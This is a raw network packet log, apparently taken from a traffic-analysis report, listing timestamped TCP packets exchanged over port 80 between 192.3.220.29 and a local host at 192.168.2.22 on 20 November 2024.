                                                                                                            Nov 20, 2024 16:58:29.704955101 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.709089994 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.709139109 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.709151030 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.713282108 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.713341951 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.713413000 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.717502117 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.717516899 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.717549086 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.721736908 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.721792936 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.721829891 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.729583025 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.729597092 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.729640007 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.732439041 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.732580900 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.732615948 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.766020060 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.766055107 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.766123056 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.768094063 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.847450972 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.847482920 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.847502947 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.849067926 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.849104881 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.849173069 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.852238894 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.852277040 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.852334023 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.855496883 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.855530977 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.855609894 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.858743906 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.858778954 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.858786106 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.861748934 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.861783028 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.861844063 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.864737034 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.864768982 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.864810944 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.867769957 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.867784023 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.867806911 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.870728970 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.870764971 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.870893002 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.873719931 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.873753071 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.873826981 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.876678944 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.876714945 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.876789093 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.879715919 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.879754066 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.879806995 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.882694006 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.882730961 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.882781982 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.885768890 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.885813951 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.885857105 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.888679028 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.888726950 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.888792038 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.891710043 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.891755104 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.891782999 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.894680977 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.894716024 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.894798994 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.896847963 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.896889925 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.896962881 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.898991108 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.899035931 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.899079084 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.901123047 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.901160955 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.901180983 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.904205084 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.904356003 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.904889107 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.908266068 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.908281088 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.908353090 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.909925938 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.910062075 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.910135031 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.912142992 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.912422895 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.912496090 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.914343119 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.914472103 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.914544106 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.916482925 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.916496992 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.916568041 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.967947960 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.968022108 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.968070030 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.970705032 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.970805883 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.970844030 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.971812010 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.971919060 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.971961975 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.976535082 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.976609945 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.976654053 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.978303909 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.978418112 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.978461981 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.981257915 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.981367111 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.981415033 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.985148907 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.985219002 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.985264063 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.987833977 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.987952948 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.987999916 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.988820076 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.050503016 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.050554037 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.051553011 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.051857948 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.051871061 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.051903963 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.054421902 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.054441929 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.054474115 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.056658030 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.056710005 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.056833982 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.057331085 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.057342052 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.057388067 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.060190916 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.060203075 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.060250044 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.062146902 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.062621117 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.062738895 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.063585997 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.063601017 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.063654900 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.065577984 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.065593958 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.065649986 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.066972017 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.067068100 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.067115068 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.069124937 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.069236994 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.069286108 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.074961901 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.075129032 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.075176954 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.075889111 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.076229095 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.076286077 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.078288078 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.078474998 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.078531981 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.087496996 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.087589979 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.087655067 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.088414907 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.088505983 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.088557959 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.090563059 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.090703964 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.090758085 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.092736959 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.092853069 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.092901945 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.094665051 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.094779015 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.094829082 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.095331907 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.095912933 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.095964909 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.096007109 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.097503901 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.097589970 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.097632885 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.099061012 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.099133968 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.099176884 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.100667953 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.100763083 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.100816965 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.102269888 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.102453947 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.102500916 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.104777098 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.104973078 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.105027914 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.107551098 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.107675076 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.107727051 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.173562050 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.173593998 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.173676968 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.175365925 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.175379992 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.175437927 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.177695036 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.177706957 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.177773952 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.179666996 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.179786921 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.179857016 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.180933952 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.180946112 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.181000948 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.182977915 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.183307886 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.183362961 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.184972048 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.184986115 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.185040951 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.187109947 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.187129974 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.187143087 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.187158108 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.187191010 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.187488079 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.187520027 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.187634945 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.187680960 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.189215899 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.189230919 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.189279079 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.194664955 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.194771051 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.194828033 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.195812941 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.196003914 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.196050882 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.198221922 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.198508024 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.198554993 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.207356930 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.207521915 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.207571983 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.208081961 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.208178043 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.208225012 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.210537910 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.210755110 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.210819006 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.212647915 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.212706089 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.212759018 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.214422941 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.214587927 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.214631081 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.215634108 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.215778112 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.215826988 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.217075109 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.217294931 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.217341900 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.218630075 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.218723059 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.218774080 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.220298052 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.220417023 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.220465899 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.221944094 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.222043037 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.222095966 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.224528074 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.224693060 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.224747896 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.227329969 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.227401018 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.227454901 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.249870062 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.250034094 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.250113964 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.250758886 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.293451071 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.293471098 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.293525934 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.294934034 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.295219898 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.295270920 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.297395945 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.297444105 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.297492981 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.299659967 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.299673080 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.299721003 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.300646067 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.300668001 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.300720930 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.302830935 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.302993059 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.303040981 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.305030107 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.305042982 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.305094004 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.307017088 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.307277918 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.307324886 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.307820082 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.307957888 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.308017015 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.309410095 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.309670925 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.309734106 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:30.311088085 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:30.311301947 CET8049178192.3.220.29192.168.2.22
